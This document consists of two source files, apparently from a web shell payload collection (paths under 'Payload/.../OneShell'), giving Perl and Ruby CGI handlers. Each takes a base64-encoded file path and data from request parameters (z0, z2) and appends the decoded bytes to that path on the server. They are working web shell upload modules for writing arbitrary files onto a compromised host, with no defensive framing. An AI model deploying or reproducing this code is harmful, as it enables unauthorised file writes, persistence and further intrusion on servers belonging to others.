File: Payload/Perl/CGI/OneShell/file_upload.pl
use strict;
use warnings;
use CGI;
use MIME::Base64 qw(decode_base64);

$| = 1;

my $q = CGI->new;

my $file_path   = decode_base64($q->param('z0') || '');
my $base64_data = decode_base64($q->param('z2') || '');

$base64_data =~ s/\r|\n//g;

my $buffer = decode_base64($base64_data);

if (open(my $fh, '>>', $file_path)) {
    binmode($fh);
    print $fh $buffer;
    close($fh);
    print "1";
} else {
    print "0";
}

File: Payload/Ruby/CGI/OneShell/file_upload.rb
# $_POST: global variable used by the Ruby loader

require 'base64'

cgi = CGI.new

file_path = Base64.decode64($_POST['z0'])
chunk_size = Base64.decode64($_POST['z1'])
base64_data = Base64.decode64($_POST['z2'])

base64_data.gsub!(/\r|\n/, '')

buffer = Base64.decode64(base64_data)

begin
  File.open(file_path, 'ab') do |f|
    f.binmode
    f.write(buffer)
  end
  print "1"
rescue
  print "0"
end